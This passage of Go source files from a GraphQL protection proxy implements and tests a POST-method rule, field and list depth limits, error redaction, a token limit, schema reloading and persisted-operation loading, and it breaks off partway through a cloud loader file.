func init() { 18 | prometheus.MustRegister(methodCounter) 19 | } 20 | 21 | type Config struct { 22 | Enabled bool `yaml:"enabled"` 23 | } 24 | 25 | func DefaultConfig() Config { 26 | return Config{ 27 | Enabled: true, 28 | } 29 | } 30 | 31 | func EnforcePostMethod(cfg Config) func(next http.Handler) http.Handler { 32 | return func(next http.Handler) http.Handler { 33 | fn := func(w http.ResponseWriter, r *http.Request) { 34 | if !cfg.Enabled { 35 | next.ServeHTTP(w, r) 36 | return 37 | } 38 | 39 | query := r.URL.Query() 40 | 41 | if r.Method != "POST" && (query.Has("query") || query.Has("extensions")) { 42 | methodCounter.WithLabelValues().Inc() 43 | http.Error(w, "405 - method not allowed", http.StatusMethodNotAllowed) 44 | return 45 | } 46 | 47 | next.ServeHTTP(w, r) 48 | } 49 | return http.HandlerFunc(fn) 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /internal/business/rules/enforce_post/enforce_post_test.go: -------------------------------------------------------------------------------- 1 | package enforce_post // nolint:revive 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "net/http" 6 | "net/http/httptest" 7 | "testing" 8 | ) 9 | 10 | func TestDisableMethodRule(t *testing.T) { 11 | type args struct { 12 | cfg Config 13 | request *http.Request 14 | } 15 | tests := []struct { 16 | name string 17 | args args 18 | want func(res *http.Response) 19 | }{ 20 | { 21 | name: "does not block when disabled", 22 | args: args{ 23 | cfg: Config{ 24 | Enabled: false, 25 | }, 26 | request: func() *http.Request { 27 | return httptest.NewRequest("GET", "/graphql", nil) 28 | }(), 29 | }, 30 | want: func(res *http.Response) { 31 | assert.Equal(t, 200, res.StatusCode) 32 | }, 33 | }, 34 | { 35 | name: "does not block GETs that contain no operation (for i.e. graphiql access)", 36 | args: args{ 37 | cfg: Config{ 38 | Enabled: true, 39 | }, 40 | request: func() *http.Request { 41 | return httptest.NewRequest("GET", "/graphql", nil) 42 | }(), 43 | }, 44 | want: func(res *http.Response) { 45 | assert.Equal(t, 200, res.StatusCode) 46 | }, 47 | }, 48 | { 49 | name: "does block GETs that contain an operation", 50 | args: args{ 51 | cfg: Config{ 52 | Enabled: true, 53 | }, 54 | request: func() *http.Request { 55 | return httptest.NewRequest("GET", "/graphql?query=foobar&variables=something", nil) 56 | }(), 57 | }, 58 | want: func(res *http.Response) { 59 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 60 | }, 61 | }, 62 | { 63 | name: "does block GETs that contain extensions for blocking persisted operations", 64 | args: args{ 65 | cfg: Config{ 66 | Enabled: true, 67 | }, 68 | request: func() *http.Request { 69 | return httptest.NewRequest("GET", "/graphql?extensions=something", nil) 70 | }(), 71 | }, 72 | want: func(res *http.Response) { 73 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 74 | }, 75 | }, 76 | { 77 | name: "does block PUT that contain extensions for blocking persisted operations", 78 | args: args{ 79 | cfg: Config{ 80 | Enabled: true, 81 | }, 82 | request: func() *http.Request { 83 | return httptest.NewRequest("PUT", "/graphql?extensions=something", nil) 84 | }(), 85 | }, 86 | want: func(res *http.Response) { 87 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 88 | }, 89 | }, 90 | { 91 | name: "does block PUT that contain extensions for blocking persisted operations", 92 | args: args{ 93 | cfg: Config{ 94 | Enabled: true, 95 | }, 96 | request: func() *http.Request { 97 | return httptest.NewRequest("DELETE", "/graphql?extensions=something", nil) 98 | }(), 99 | }, 100 | want: func(res *http.Response) { 101 | assert.Equal(t, http.StatusMethodNotAllowed, res.StatusCode) 102 | }, 103 | }, 104 | } 105 | for _, tt := range tests { 106 | t.Run(tt.name, func(_ *testing.T) { 107 | rec := httptest.NewRecorder() 108 | 109 | mw := EnforcePostMethod(tt.args.cfg) 110 | mw(requestRecorder{}).ServeHTTP(rec, tt.args.request) 111 | result := rec.Result() 112 | defer result.Body.Close() 113 | 114 | tt.want(result) 115 | }) 116 | } 117 | } 118 | 119 | type requestRecorder struct { 120 | } 121 | 122 | func (r requestRecorder) ServeHTTP(writer http.ResponseWriter, _ *http.Request) { 123 | _, _ = writer.Write([]byte("hello world")) 124 | } 125 | -------------------------------------------------------------------------------- /internal/business/rules/max_depth/max_depth.go: -------------------------------------------------------------------------------- 1 | package max_depth // nolint:revive 2 | 3 | import ( 4 | "github.com/prometheus/client_golang/prometheus" 5 | "github.com/vektah/gqlparser/v2/ast" 6 | "github.com/vektah/gqlparser/v2/validator" 7 | "log/slog" 8 | ) 9 | 10 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "max_depth", 13 | Name: "results", 14 | Help: "The results of the max_depth rule", 15 | }, 16 | []string{"type", "result"}, 17 | ) 18 | 19 | type Config struct { 20 | Enabled bool `yaml:"enabled"` // deprecated 21 | Max int `yaml:"max"` // deprecated 22 | Field MaxRule `yaml:"field"` 23 | List MaxRule `yaml:"list"` 24 | RejectOnFailure bool `yaml:"reject_on_failure"` // deprecated 25 | } 26 | 27 | type MaxRule struct { 28 | Enabled bool `yaml:"enabled"` 29 | Max int `yaml:"max"` 30 | RejectOnFailure bool `yaml:"reject_on_failure"` 31 | } 32 | 33 | func DefaultConfig() Config { 34 | return Config{ 35 | Enabled: false, 36 | Max: 15, 37 | Field: MaxRule{ 38 | Enabled: true, 39 | Max: 15, 40 | RejectOnFailure: true, 41 | }, 42 | List: MaxRule{ 43 | Enabled: true, 44 | Max: 2, 45 | RejectOnFailure: true, 46 | }, 47 | RejectOnFailure: false, 48 | } 49 | } 50 | 51 | func init() { 52 | prometheus.MustRegister(resultCounter) 53 | } 54 | 55 | func NewMaxDepthRule(log *slog.Logger, cfg Config) { // nolint:funlen,cyclop // to be cleaned up after deprecated configuration fields are removed 56 | if cfg.Max != cfg.Field.Max { 57 | log.Warn("Using old `max_depth` configuration. Please update to new configuration options, see https://github.com/supportivefe/graphql-protect/blob/main/docs/protections/max_depth.md") 58 | } 59 | if cfg.Enabled && cfg.Field.Enabled { 60 | // if both old and new config options are supplied, disable the old to prevent doing it twice 61 | cfg.Enabled = false 62 | } 63 | 64 | validator.AddRule("MaxDepth", func(observers *validator.Events, addError validator.AddErrFunc) { 65 | observers.OnOperation(func(_ *validator.Walker, operation *ast.OperationDefinition) { 66 | fieldDepth, listDepth := countDepth(operation.SelectionSet) 67 | 68 | if cfg.Field.Enabled { 69 | if fieldDepth > cfg.Field.Max { 70 | if cfg.Field.RejectOnFailure { 71 | addError( 72 | validator.Message("syntax error: Field depth limit of %d exceeded, found %d", cfg.Field.Max, fieldDepth), 73 | validator.At(operation.Position), 74 | ) 75 | resultCounter.WithLabelValues("field", "rejected").Inc() 76 | } else { 77 | resultCounter.WithLabelValues("field", "failed").Inc() 78 | } 79 | } else { 80 | resultCounter.WithLabelValues("field", "allowed").Inc() 81 | } 82 | } 83 | 84 | if cfg.List.Enabled { 85 | if listDepth > cfg.List.Max { 86 | if cfg.List.RejectOnFailure { 87 | addError( 88 | validator.Message("syntax error: List depth limit of %d exceeded, found %d", cfg.List.Max, listDepth), 89 | validator.At(operation.Position), 90 | ) 91 | resultCounter.WithLabelValues("list", "rejected").Inc() 92 | } else { 93 | resultCounter.WithLabelValues("list", "failed").Inc() 94 | } 95 | } else { 96 | resultCounter.WithLabelValues("list", "allowed").Inc() 97 | } 98 | } 99 | 100 | if cfg.Enabled { 101 | if fieldDepth > cfg.Max { 102 | if cfg.RejectOnFailure { 103 | addError( 104 | validator.Message("syntax error: Depth limit of %d exceeded, found %d", cfg.Max, fieldDepth), 105 | validator.At(operation.Position), 106 | ) 107 | resultCounter.WithLabelValues("field", "rejected").Inc() 108 | } else { 109 | resultCounter.WithLabelValues("field", "failed").Inc() 110 | } 111 | } else { 112 | resultCounter.WithLabelValues("field", "allowed").Inc() 113 | } 114 | } 115 | }) 116 | }) 117 | } 118 | 119 | func countDepth(selectionSet ast.SelectionSet) (int, int) { // nolint:cyclop // inherently cyclomatic 120 | if selectionSet == nil { 121 | return 0, 0 122 | } 123 | 124 | // start with 1 depth because root counts as the first depth 125 | fieldDepth := 1 126 | // start with 0 depth because we don't know yet if it is a list type 127 | listDepth := 0 128 | 129 | for _, selection := range selectionSet { 130 | switch v := selection.(type) { 131 | case *ast.Field: 132 | fieldSelectionDepth, listSelectionDepth := countDepth(v.SelectionSet) 133 | fieldSelectionDepth++ // increase because we're on a field 134 | 135 | if v.Definition != nil && isList(v.Definition.Type) { 136 | listSelectionDepth++ // increase because we're on a list 137 | } 138 | if listSelectionDepth > listDepth { 139 | listDepth = listSelectionDepth 140 | } 141 | if fieldSelectionDepth > fieldDepth { 142 | fieldDepth = fieldSelectionDepth 143 | } 144 | case *ast.FragmentSpread: 145 | fieldSelectionDepth, listSelectionDepth := countDepth(v.Definition.SelectionSet) 146 | if fieldSelectionDepth > fieldDepth { 147 | fieldDepth = fieldSelectionDepth 148 | } 149 | if listSelectionDepth > listDepth { 150 | listDepth = listSelectionDepth 151 | } 152 | } 153 | } 154 | return fieldDepth, listDepth 155 | 156 | } 157 | 158 | func isList(t *ast.Type) bool { 159 | if t == nil { 160 | return false 161 | } 162 | 163 | if t.NamedType != "" { 164 | return false 165 | } 166 | return true 167 | } 168 | -------------------------------------------------------------------------------- /internal/business/rules/max_depth/max_depth_test.go: -------------------------------------------------------------------------------- 1 | package max_depth // nolint:revive 2 | 3 | import ( 4 | "fmt" 5 | "github.com/stretchr/testify/assert" 6 | "github.com/vektah/gqlparser/v2" 7 | "github.com/vektah/gqlparser/v2/ast" 8 | "github.com/vektah/gqlparser/v2/parser" 9 | "github.com/vektah/gqlparser/v2/validator" 10 | "log/slog" 11 | "testing" 12 | ) 13 | 14 | func Test_MaxListDepthRule(t *testing.T) { 15 | schema := ` 16 | type Query { 17 | me: User 18 | } 19 | 20 | type User { 21 | id: ID! 22 | name: String 23 | friends: [User!]! 24 | } 25 | 26 | ` 27 | type args struct { 28 | query string 29 | schema string 30 | cfg Config 31 | } 32 | tests := []struct { 33 | name string 34 | args args 35 | want error 36 | }{ 37 | { 38 | name: "no query yields zero count", 39 | args: args{ 40 | query: "", 41 | schema: schema, 42 | cfg: Config{ 43 | List: MaxRule{ 44 | Max: 15, 45 | Enabled: true, 46 | }, 47 | }, 48 | }, 49 | want: nil, 50 | }, 51 | { 52 | name: "Calculate the depth properly with fragments", 53 | args: args{ 54 | cfg: Config{ 55 | List: MaxRule{ 56 | Max: 3, 57 | Enabled: true, 58 | RejectOnFailure: true, 59 | }, 60 | }, 61 | query: ` 62 | query A { 63 | me { 64 | ...UserFragment 65 | } 66 | } 67 | fragment UserFragment on User { 68 | id 69 | name 70 | }`, 71 | schema: schema, 72 | }, 73 | want: nil, 74 | }, 75 | { 76 | name: "Calculate list depth properly", 77 | args: args{ 78 | cfg: Config{ 79 | Enabled: false, 80 | Field: MaxRule{ 81 | Enabled: false, 82 | }, 83 | List: MaxRule{ 84 | Enabled: true, 85 | Max: 2, 86 | RejectOnFailure: true, 87 | }, 88 | }, 89 | query: ` 90 | query A { 91 | me { 92 | id 93 | name 94 | friends { 95 | name 96 | friends { 97 | name 98 | friends { 99 | name 100 | friends { 101 | name 102 | } 103 | } 104 | } 105 | } 106 | } 107 | }`, 108 | schema: schema, 109 | }, 110 | want: fmt.Errorf("syntax error: List depth limit of %d exceeded, found %d", 2, 4), 111 | }, 112 | { 113 | name: "Calculates list depth per nested list. Does not sum counts of each list", 114 | args: args{ 115 | cfg: Config{ 116 | Enabled: false, 117 | Field: MaxRule{ 118 | Enabled: false, 119 | }, 120 | List: MaxRule{ 121 | Enabled: true, 122 | Max: 2, 123 | RejectOnFailure: true, 124 | }, 125 | }, 126 | query: ` 127 | query A { 128 | a1: me { 129 | id 130 | name 131 | friends { 132 | name 133 | friends { 134 | name 135 | } 136 | } 137 | } 138 | a2: me { 139 | id 140 | name 141 | friends { 142 | name 143 | friends { 144 | name 145 | } 146 | } 147 | } 148 | }`, 149 | schema: schema, 150 | }, 151 | want: nil, 152 | }, 153 | } 154 | for _, tt := range tests { 155 | t.Run(tt.name, func(t *testing.T) { 156 | NewMaxDepthRule(slog.Default(), tt.args.cfg) 157 | 158 | query, _ := parser.ParseQuery(&ast.Source{Name: "ff", Input: tt.args.query}) 159 | schema := gqlparser.MustLoadSchema(&ast.Source{ 160 | Name: "graph/schema.graphqls", 161 | Input: tt.args.schema, 162 | BuiltIn: false, 163 | }) 164 | 165 | errs := validator.Validate(schema, query) 166 | 167 | if tt.want == nil { 168 | assert.Empty(t, errs) 169 | } else { 170 | assert.Equal(t, tt.want.Error(), errs[0].Message) 171 | } 172 | 173 | validator.RemoveRule("MaxDepth") 174 | }) 175 | } 176 | } 177 | 178 | func Test_MaxDepthRule(t *testing.T) { 179 | schema := ` 180 | type Query { 181 | getBook(title: String): Book 182 | } 183 | 184 | type Book { 185 | id: ID! 186 | title: String 187 | author: Author! 188 | price: Price! 189 | } 190 | type Author { 191 | id: ID! 192 | name: String 193 | } 194 | type Price { 195 | price: Int! 196 | id: ID! 197 | } 198 | ` 199 | type args struct { 200 | query string 201 | schema string 202 | cfg Config 203 | } 204 | tests := []struct { 205 | name string 206 | args args 207 | want error 208 | }{ 209 | { 210 | name: "no query yields zero count", 211 | args: args{ 212 | query: "", 213 | schema: schema, 214 | cfg: Config{ 215 | Field: MaxRule{ 216 | Max: 15, 217 | Enabled: true, 218 | }, 219 | }, 220 | }, 221 | want: nil, 222 | }, 223 | { 224 | name: "works with old config", 225 | args: args{ 226 | cfg: Config{ 227 | Enabled: true, 228 | Max: 2, 229 | RejectOnFailure: true, 230 | Field: MaxRule{ 231 | Enabled: false, 232 | Max: 0, 233 | RejectOnFailure: false, 234 | }, 235 | }, 236 | query: ` 237 | query { 238 | getBook(title: "null") { 239 | title 240 | price { 241 | price 242 | id 243 | } 244 | } 245 | }`, 246 | schema: schema, 247 | }, 248 | want: fmt.Errorf("syntax error: Depth limit of %d exceeded, found %d", 2, 3), 249 | }, 250 | { 251 | name: "Calculate the depth properly with fragments", 252 | args: args{ 253 | cfg: Config{ 254 | Field: MaxRule{ 255 | Max: 3, 256 | Enabled: true, 257 | RejectOnFailure: true, 258 | }, 259 | }, 260 | query: ` 261 | query A { 262 | getBook(title: "null") { 263 | id 264 | ...BookFragment 265 | } 266 | } 267 | fragment BookFragment on Book { 268 | author { 269 | name 270 | } 271 | }`, 272 | schema: schema, 273 | }, 274 | want: nil, 275 | }, 276 | { 277 | name: "Calculate depth properly", 278 | args: args{ 279 | cfg: Config{ 280 | Field: MaxRule{ 281 | Enabled: true, 282 | Max: 2, 283 | RejectOnFailure: true, 284 | }, 285 | }, 286 | query: ` 287 | query { 288 | getBook(title: "null") { 289 | title 290 | price { 291 | price 292 | id 293 | } 294 | } 295 | }`, 296 | schema: schema, 297 | }, 298 | want: fmt.Errorf("syntax error: Field depth limit of %d exceeded, found %d", 2, 3), 299 | }, 300 | { 301 | name: "Works correctly with fragments", 302 | args: args{ 303 | cfg: Config{ 304 | Field: MaxRule{ 305 | Max: 2, 306 | Enabled: true, 307 | RejectOnFailure: true, 308 | }, 309 | }, 310 | query: ` 311 | query A { 312 | getBook(title: "null") { 313 | id 314 | ...BookFragment 315 | } 316 | } 317 | fragment BookFragment on Book { 318 | author { 319 | name 320 | } 321 | }`, 322 | schema: schema, 323 | }, 324 | want: fmt.Errorf("syntax error: Field depth limit of %d exceeded, found %d", 2, 3), 325 | }, 326 | } 327 | for _, tt := range tests { 328 | t.Run(tt.name, func(t *testing.T) { 329 | NewMaxDepthRule(slog.Default(), tt.args.cfg) 330 | 331 | query, _ := parser.ParseQuery(&ast.Source{Name: "ff", Input: tt.args.query}) 332 | schema := gqlparser.MustLoadSchema(&ast.Source{ 333 | Name: "graph/schema.graphqls", 334 | Input: tt.args.schema, 335 | BuiltIn: false, 336 | }) 337 | 338 | errs := validator.Validate(schema, query) 339 | 340 | if tt.want == nil { 341 | assert.Empty(t, errs) 342 | } else { 343 | assert.Equal(t, tt.want.Error(), errs[0].Message) 344 | } 345 | 346 | validator.RemoveRule("MaxDepth") 347 | }) 348 | } 349 | } 350 | -------------------------------------------------------------------------------- /internal/business/rules/obfuscate_upstream_errors/obfuscate_upstream_errors.go: -------------------------------------------------------------------------------- 1 | package obfuscate_upstream_errors // nolint:revive 2 | 3 | type ObfuscateUpstreamErrors struct { 4 | enabled bool 5 | } 6 | 7 | func NewObfuscateUpstreamErrors(obfuscateUpstreamErrors bool) *ObfuscateUpstreamErrors { 8 | return &ObfuscateUpstreamErrors{ 9 | enabled: obfuscateUpstreamErrors, 10 | } 11 | } 12 | 13 | func (a *ObfuscateUpstreamErrors) ProcessBody(payload map[string]interface{}) map[string]interface{} { 14 | redactedErrorArray := []map[string]interface{}{ 15 | { 16 | "message": "Error(s) redacted", 17 | }, 18 | } 19 | 20 | if payload["errors"] != nil { 21 | payload["errors"] = redactedErrorArray 22 | } 23 | 24 | return payload 25 | } 26 | 27 | func (a *ObfuscateUpstreamErrors) Enabled() bool { 28 | return a.enabled 29 | } 30 | -------------------------------------------------------------------------------- /internal/business/rules/obfuscate_upstream_errors/obfuscate_upstream_errors_test.go: -------------------------------------------------------------------------------- 1 | package obfuscate_upstream_errors // nolint:revive 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func TestProcessBody(t *testing.T) { 9 | type args struct { 10 | payload map[string]interface{} 11 | } 12 | tests := []struct { 13 | name string 14 | args args 15 | want map[string]interface{} 16 | }{ 17 | { 18 | name: "nothing happens when not expected format", 19 | args: args{ 20 | payload: map[string]interface{}{ 21 | "hi": "bye", 22 | }, 23 | }, 24 | want: map[string]interface{}{ 25 | "hi": "bye", 26 | }, 27 | }, 28 | { 29 | name: "processes errors payload", 30 | args: args{ 31 | payload: map[string]interface{}{ 32 | "errors": []map[string]interface{}{ 33 | { 34 | "message": "hello", 35 | }, 36 | }, 37 | }, 38 | }, 39 | want: map[string]interface{}{ 40 | "errors": []map[string]interface{}{ 41 | { 42 | "message": "Error(s) redacted", 43 | }, 44 | }, 45 | }, 46 | }, 47 | { 48 | name: "can handle unexpected types", 49 | args: args{ 50 | payload: map[string]interface{}{ 51 | "errors": []map[string]interface{}{ 52 | { 53 | "message": 1, 54 | }, 55 | }, 56 | }, 57 | }, 58 | want: map[string]interface{}{ 59 | "errors": []map[string]interface{}{ 60 | { 61 | "message": "Error(s) redacted", 62 | }, 63 | }, 64 | }, 65 | }, 66 | { 67 | name: "Replaces suggestions when found", 68 | args: args{ 69 | payload: map[string]interface{}{ 70 | "errors": []map[string]interface{}{ 71 | { 72 | "message": "Did you mean 'foobar'?", 73 | }, 74 | }, 75 | }, 76 | }, 77 | want: map[string]interface{}{ 78 | "errors": []map[string]interface{}{ 79 | { 80 | "message": "Error(s) redacted", 81 | }, 82 | }, 83 | }, 84 | }, 85 | { 86 | name: "Doesn't affect any other fields", 87 | args: args{ 88 | payload: map[string]interface{}{ 89 | "data": map[string]interface{}{ 90 | "foo": "bar", 91 | "boolean": 1, 92 | }, 93 | "errors": []map[string]interface{}{ 94 | { 95 | "message": "Error(s) redacted", 96 | }, 97 | }, 98 | }, 99 | }, 100 | want: map[string]interface{}{ 101 | "data": map[string]interface{}{ 102 | "foo": "bar", 103 | "boolean": 1, 104 | }, 105 | "errors": []map[string]interface{}{ 106 | { 107 | "message": "Error(s) redacted", 108 | }, 109 | }, 110 | }, 111 | }, 112 | } 113 | for _, tt := range tests { 114 | t.Run(tt.name, func(t *testing.T) { 115 | b := NewObfuscateUpstreamErrors(true) 116 | 117 | if got := b.ProcessBody(tt.args.payload); !reflect.DeepEqual(got, tt.want) { 118 | t.Errorf("ProcessBody() = %v, want %v", got, tt.want) 119 | } 120 | }) 121 | } 122 | } 123 | -------------------------------------------------------------------------------- /internal/business/rules/tokens/tokens.go: -------------------------------------------------------------------------------- 1 | package tokens 2 | 3 | import ( 4 | "fmt" 5 | "github.com/prometheus/client_golang/prometheus" 6 | "github.com/vektah/gqlparser/v2/ast" 7 | "github.com/vektah/gqlparser/v2/lexer" 8 | ) 9 | 10 | var resultCounter = prometheus.NewCounterVec(prometheus.CounterOpts{ 11 | Namespace: "graphql_protect", 12 | Subsystem: "max_tokens", 13 | Name: "results", 14 | Help: "The results of the max tokens rule", 15 | }, 16 | []string{"result"}, 17 | ) 18 | 19 | type Config struct { 20 | Enabled bool `yaml:"enabled"` 21 | Max int `yaml:"max"` 22 | RejectOnFailure bool `yaml:"reject_on_failure"` 23 | } 24 | 25 | func DefaultConfig() Config { 26 | return Config{ 27 | Enabled: true, 28 | Max: 1_000, 29 | RejectOnFailure: true, 30 | } 31 | } 32 | 33 | func init() { 34 | prometheus.MustRegister(resultCounter) 35 | } 36 | 37 | type MaxTokensRule struct { 38 | cfg Config 39 | } 40 | 41 | func MaxTokens(cfg Config) *MaxTokensRule { 42 | return &MaxTokensRule{ 43 | cfg: cfg, 44 | } 45 | } 46 | 47 | func (t *MaxTokensRule) Validate(source *ast.Source) error { 48 | if !t.cfg.Enabled { 49 | return nil 50 | } 51 | 52 | lex := lexer.New(source) 53 | count := 0 54 | 55 | for { 56 | tok, err := lex.ReadToken() 57 | 58 | if err != nil { 59 | return err 60 | } 61 | 62 | if tok.Kind == lexer.EOF { 63 | break 64 | } 65 | 66 | count++ 67 | } 68 | 69 | if count > t.cfg.Max { 70 | if t.cfg.RejectOnFailure { 71 | resultCounter.WithLabelValues("rejected").Inc() 72 | return fmt.Errorf("operation has exceeded maximum tokens. found [%d], max [%d]", count, t.cfg.Max) 73 | } 74 | resultCounter.WithLabelValues("failed").Inc() 75 | } 76 | resultCounter.WithLabelValues("allowed").Inc() 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /internal/business/rules/tokens/tokens_test.go: -------------------------------------------------------------------------------- 1 | package tokens 2 | 3 | import ( 4 | "github.com/stretchr/testify/assert" 5 | "github.com/vektah/gqlparser/v2/ast" 6 | "testing" 7 | ) 8 | 9 | func TestMaxTokens(t *testing.T) { 10 | type args struct { 11 | cfg Config 12 | operation string 13 | } 14 | tests := []struct { 15 | name string 16 | args args 17 | wantErr bool 18 | }{ 19 | { 20 | name: "rule disabled does nothing", 21 | args: args{ 22 | cfg: Config{ 23 | Enabled: false, 24 | Max: 0, 25 | RejectOnFailure: true, 26 | }, 27 | operation: "query { foo }", 28 | }, 29 | wantErr: false, 30 | }, 31 | { 32 | name: "yields error when tokens exceed max", 33 | args: args{ 34 | cfg: Config{ 35 | Enabled: true, 36 | Max: 1, 37 | RejectOnFailure: true, 38 | }, 39 | operation: "query { foo }", 40 | }, 41 | wantErr: true, 42 | }, 43 | { 44 | name: "yields no error when tokens less than max", 45 | args: args{ 46 | cfg: Config{ 47 | Enabled: true, 48 | Max: 1000000, 49 | RejectOnFailure: true, 50 | }, 51 | operation: "query { foo }", 52 | }, 53 | wantErr: false, 54 | }, 55 | { 56 | name: "yields no error when tokens exceed max but failure on rejections is false", 57 | args: args{ 58 | cfg: Config{ 59 | Enabled: true, 60 | Max: 1, 61 | RejectOnFailure: false, 62 | }, 63 | operation: "query { foo }", 64 | }, 65 | wantErr: false, 66 | }, 67 | } 68 | for _, tt := range tests { 69 | t.Run(tt.name, func(t *testing.T) { 70 | rule := MaxTokens(tt.args.cfg) 71 | 72 | source := &ast.Source{ 73 | Input: tt.args.operation, 74 | } 75 | 76 | err := rule.Validate(source) 77 | 78 | if tt.wantErr { 79 | assert.Error(t, err) 80 | } else { 81 | assert.NoError(t, err) 82 | } 83 | }) 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /internal/business/schema/schema.go: -------------------------------------------------------------------------------- 1 | package schema 2 | 3 | import ( 4 | "fmt" 5 | "github.com/prometheus/client_golang/prometheus" 6 | "github.com/vektah/gqlparser/v2" 7 | "github.com/vektah/gqlparser/v2/ast" 8 | "log/slog" 9 | "os" 10 | "time" 11 | ) 12 | 13 | var reloadGauge = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 14 | Namespace: "graphql_protect", 15 | Subsystem: "schema", 16 | Name: "reload", 17 | Help: "Gauge tracking reloading behavior", 18 | ConstLabels: nil, 19 | }, 20 | []string{"state"}) 21 | 22 | type Config struct { 23 | Path string `yaml:"path"` 24 | AutoReload struct { 25 | Enabled bool `yaml:"enabled"` 26 | Interval time.Duration `yaml:"interval"` 27 | } `yaml:"auto_reload"` 28 | } 29 | 30 | func DefaultConfig() Config { 31 | return Config{ 32 | Path: "./schema.graphql", 33 | AutoReload: struct { 34 | Enabled bool `yaml:"enabled"` 35 | Interval time.Duration `yaml:"interval"` 36 | }(struct { 37 | Enabled bool 38 | Interval time.Duration 39 | }{ 40 | Enabled: true, 41 | Interval: 30 * time.Second, 42 | }), 43 | } 44 | } 45 | 46 | type Provider struct { 47 | cfg Config 48 | schema *ast.Schema 49 | done chan bool 50 | refreshTicker *time.Ticker 51 | log *slog.Logger 52 | } 53 | 54 | func NewSchema(cfg Config, log *slog.Logger) (*Provider, error) { 55 | refreshTicker := func() *time.Ticker { 56 | if !cfg.AutoReload.Enabled { 57 | return nil 58 | } 59 | return time.NewTicker(cfg.AutoReload.Interval) 60 | }() 61 | 62 | p := Provider{ 63 | cfg: cfg, 64 | // nil until we load 65 | schema: nil, 66 | // buffered in case we don't have reloading enabled 67 | done: make(chan bool, 1), 68 | refreshTicker: refreshTicker, 69 | log: log, 70 | } 71 | 72 | err := p.loadFromFs() 73 | if err != nil { 74 | return nil, fmt.Errorf("unable to load schema from disk [%s]: %w", p.cfg.Path, err) 75 | } 76 | 77 | // initiate auto reloading 78 | p.reload() 79 | 80 | return &p, nil 81 | } 82 | 83 | func (p *Provider) load(contents string) error { 84 | schema, err := gqlparser.LoadSchema(&ast.Source{ 85 | Name: "graph/schema.graphqls", 86 | Input: contents, 87 | BuiltIn: false, 88 | }) 89 | if err != nil { 90 | return err 91 | } 92 | 93 | p.schema = schema 94 | return nil 95 | } 96 | 97 | func (p *Provider) loadFromFs() error { 98 | contents, err := os.ReadFile(p.cfg.Path) 99 | if err != nil { 100 | return err 101 | 102 | } 103 | return p.load(string(contents)) 104 | } 105 | 106 | func (p *Provider) Get() *ast.Schema { 107 | return p.schema 108 | } 109 | 110 | func (p *Provider) reload() { 111 | if !p.cfg.AutoReload.Enabled { 112 | return 113 | } 114 | 115 | go func() { 116 | for { 117 | select { 118 | case <-p.done: 119 | return 120 | case <-p.refreshTicker.C: 121 | err := p.loadFromFs() 122 | if err != nil { 123 | p.log.Warn("Error loading from local dir", "err", err) 124 | reloadGauge.WithLabelValues("failed").Inc() 125 | continue 126 | } 127 | reloadGauge.WithLabelValues("success").Inc() 128 | } 129 | } 130 | }() 131 | } 132 | 133 | func (p *Provider) Stop() { 134 | p.done <- true 135 | } 136 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/dir_loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "context" 5 | "github.com/prometheus/client_golang/prometheus" 6 | "log/slog" 7 | "maps" 8 | "os" 9 | "path/filepath" 10 | ) 11 | 12 | var _ Loader = &LocalLoader{} 13 | 14 | var ( 15 | fileLoaderGauge = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 16 | Namespace: "graphql_protect", 17 | Subsystem: "dir_loader", 18 | Name: "files_loaded_gauge", 19 | Help: "number of files loaded from disk", 20 | ConstLabels: nil, 21 | }, []string{}) 22 | ) 23 | 24 | // LocalLoader loads persisted operations from a filesystem directory 25 | // It looks at all files in the directory, but doesn't traverse subdirectories 26 | // If it finds a file with a `.json` extension it attempts to unmarshall it and use it as 27 | // a source for persisted operations/ 28 | // If it fails to load a file it moves on to the next file in the directory 29 | type LocalLoader struct { 30 | cfg Config 31 | log *slog.Logger 32 | } 33 | 34 | func (d *LocalLoader) Type() string { 35 | return "local" 36 | } 37 | 38 | func NewLocalDirLoader(cfg Config, log *slog.Logger) *LocalLoader { 39 | return &LocalLoader{ 40 | cfg: cfg, 41 | log: log, 42 | } 43 | } 44 | 45 | func init() { 46 | prometheus.MustRegister(fileLoaderGauge) 47 | } 48 | 49 | func (d *LocalLoader) Load(_ context.Context) (map[string]PersistedOperation, error) { 50 | files, err := os.ReadDir(d.cfg.Loader.Location) 51 | if err != nil { 52 | // if we can't read the dir, try creating it 53 | err := os.Mkdir(d.cfg.Loader.Location, 0750) 54 | if err != nil { 55 | return nil, err 56 | } 57 | } 58 | 59 | result := map[string]PersistedOperation{} 60 | var filesProcessed = 0 61 | for _, file := range files { 62 | if file.IsDir() { 63 | continue 64 | } 65 | if filepath.Ext(file.Name()) == ".json" { 66 | filePath := filepath.Join(d.cfg.Loader.Location, file.Name()) 67 | contents, err := os.ReadFile(filePath) 68 | if err != nil { 69 | d.log.Warn("Error reading file", "err", err) 70 | continue 71 | } 72 | 73 | filesProcessed++ 74 | 75 | data, err := unmarshallPersistedOperations(contents) 76 | if err != nil { 77 | d.log.Warn("error unmarshalling operation file", "bytes", len(contents), "contents", string(contents), "filepath", filePath, "err", err) 78 | continue 79 | } 80 | 81 | maps.Copy(result, data) 82 | } 83 | } 84 | 85 | fileLoaderGauge.WithLabelValues().Set(float64(filesProcessed)) 86 | 87 | return result, nil 88 | } 89 | -------------------------------------------------------------------------------- /internal/business/trusteddocuments/gcp_loader.go: -------------------------------------------------------------------------------- 1 | package trusteddocuments // nolint:revive 2 | 3 | import ( 4 | "cloud.google.com/go/storage" 5 | "context" 6 | "errors" 7 | "fmt" 8 | "github.com/prometheus/client_golang/prometheus" 9 | "google.golang.org/api/iterator" 10 | "io" 11 | "log/slog" 12 | "maps" 13 | "time" 14 | ) 15 | 16 | var _ Loader = &GcpLoader{} 17 | 18 | var ( 19 | filesLoadedCounter = 